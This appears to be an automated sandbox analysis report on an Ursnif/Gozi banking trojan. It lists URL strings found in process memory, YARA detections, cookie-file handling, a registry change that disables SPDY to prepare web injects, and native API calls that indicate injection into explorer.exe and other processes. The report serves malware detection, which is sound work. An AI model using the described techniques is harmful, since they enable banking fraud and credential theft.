Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_028231EC

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\System32\loaddll32.exe

Memory allocated: 73CA0000 page execute and read and write

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA1CEF GetProcAddress,NtCreateSection,memset,	0_2_73CA1CEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA1880 NtMapViewOfSection,	0_2_73CA1880
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA15AB GetLastError,NtClose,	0_2_73CA15AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA24C5 NtQueryVirtualMemory,	0_2_73CA24C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282620F GetProcAddress,NtCreateSection,memset,	0_2_0282620F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02823A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02823A77
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_0282A3DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02831813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02831813
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02816825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_02816825
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_0281B868
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282865A NtQueryInformationProcess,	0_2_0282865A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_0281976D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0283345F NtMapViewOfSection,	0_2_0283345F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02811D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	0_2_02811D18
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_0281C536
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02832557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_02832557
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02835A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_02835A8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282AAB7 NtGetContextThread,RtlNtStatusToDosError,	0_2_0282AAB7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02820084 memset,NtQueryInformationProcess,	0_2_02820084
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02816F11 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_02816F11
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02814C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_02814C96
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02818DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_02818DAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02827511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_02827511
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02812D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02812D26
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E3830 NtWriteVirtualMemory,	26_2_001E3830
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E387C NtCreateSection,	26_2_001E387C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DBAB4 NtAllocateVirtualMemory,	26_2_001DBAB4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1AC4 NtQueryInformationProcess,	26_2_001E1AC4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DCCA0 NtReadVirtualMemory,	26_2_001DCCA0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	26_2_001EF560
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FADD4 NtQueryInformationProcess,	26_2_001FADD4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	26_2_001F676C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EFFCC NtMapViewOfSection,	26_2_001EFFCC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	26_2_001FF7EC
Source: C:\Windows\System32\control.exe	Code function: 26_2_00211004 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_00211004
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5BAB4 NtAllocateVirtualMemory,	29_2_03B5BAB4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61AC4 NtQueryInformationProcess,	29_2_03B61AC4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B63830 NtWriteVirtualMemory,	29_2_03B63830
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6387C NtCreateSection,	29_2_03B6387C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	29_2_03B7F7EC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6FFCC NtMapViewOfSection,	29_2_03B6FFCC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7676C NtSetContextThread,NtUnmapViewOfSection,NtClose,	29_2_03B7676C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6AD14 NtQuerySystemInformation,	29_2_03B6AD14
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	29_2_03B6F560
